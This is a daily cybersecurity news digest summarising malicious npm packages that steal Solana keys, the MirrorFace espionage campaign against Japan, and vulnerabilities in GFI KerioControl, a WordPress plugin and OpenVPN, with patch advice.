Malicious actors continue to exploit trusted ecosystems, with researchers uncovering npm packages stealing Solana private keys and exfiltrating them via Gmail. Masquerading as legitimate tools, these packages drain victims' wallets while amplifying their reach through GitHub repositories.

Threat actors are actively exploiting a critical flaw in GFI KerioControl firewalls, to achieve remote code execution. Despite a patch released by GFI, attempts to abuse the vulnerability have surged, targeting over 23,800 exposed instances worldwide.

Meanwhile, the Fancy Product Designer plugin for WordPress remains vulnerable to critical flaws, including file upload and SQL injection vulnerabilities. With no response from the developer, over 20,000 sites face heightened risk from these exploits.

Top Malware Reported in the Last 24 Hours

Malicious npm packages target Solana

Socket discovered malicious npm packages designed to steal Solana private keys and transfer them via Gmail. The packages masquerade as legitimate tools to avoid detection, but actually function as malware. Two threat actors are involved in this scheme, using overlapping tactics to steal and exfiltrate private keys, while also draining victims' Solana wallets. The attackers use Gmail to send the stolen keys, making it harder to detect the exfiltration attempts. They also published malicious code on GitHub repositories to amplify their malware campaign.

MirrorFace uses NOOPDOOR and ANEL

Japan's National Police Agency (NPA) and NCSC allege that a China-linked group called MirrorFace has been attacking organizations, businesses, and individuals in Japan since 2019. The main goal of these attacks is to steal information about Japan's national security and advanced technology. MirrorFace, also known as Earth Kasha, is part of the APT10 group and has targeted Japanese entities using various tools like ANEL, LODEINFO, and NOOPDOOR. The attacks are divided into three campaigns.

Top Vulnerabilities Reported in the Last 24 Hours

Critical RCE bug in GFI KerioControl

Threat actors are attempting to abuse a security flaw in GFI KerioControl firewalls, allowing RCE, if successful. The vulnerability, CVE-2024-52875, involves a CRLF injection attack, which can lead to HTTP response splitting and cross-site scripting. This flaw affects KerioControl versions 9.2.5 to 9.4.5. GFI released a fix for this vulnerability, with version 9.4.5 Patch 1. Exploitation attempts began on December 28, 2024, from several IP addresses in Singapore and Hong Kong. There are over 23,800 exposed GFI KerioControl instances globally, mostly in various countries.

Unpatched flaws in Fancy Product Designer 

The Fancy Product Designer plugin for WordPress is vulnerable to two critical security flaws. CVE-2024-51919 allows unauthenticated users to upload harmful files due to insecure file upload functions. CVE-2024-51818 is an SQL injection issue from improper user input handling that can compromise databases. Despite being notified about the issues, Radykal has not responded or released a security update, leaving over 20,000 users at risk.

Code execution vulnerabilities in OpenVPN

OpenVPN has fixed three major vulnerabilities in version 2.6.11, released on June 21, 2024. The most serious issue, CVE-2024-5594, allows attackers to inject harmful data into third-party applications, with a CVSS score of 9.1. Another flaw, CVE-2024-4877, affects Windows users by enabling attackers to steal user credentials through the OpenVPN GUI. Additionally, CVE-2024-28882 lets authorized clients stay connected to the server even after a disconnect, posing risks for unauthorized access. Users are strongly advised to update to version 2.6.11 or later.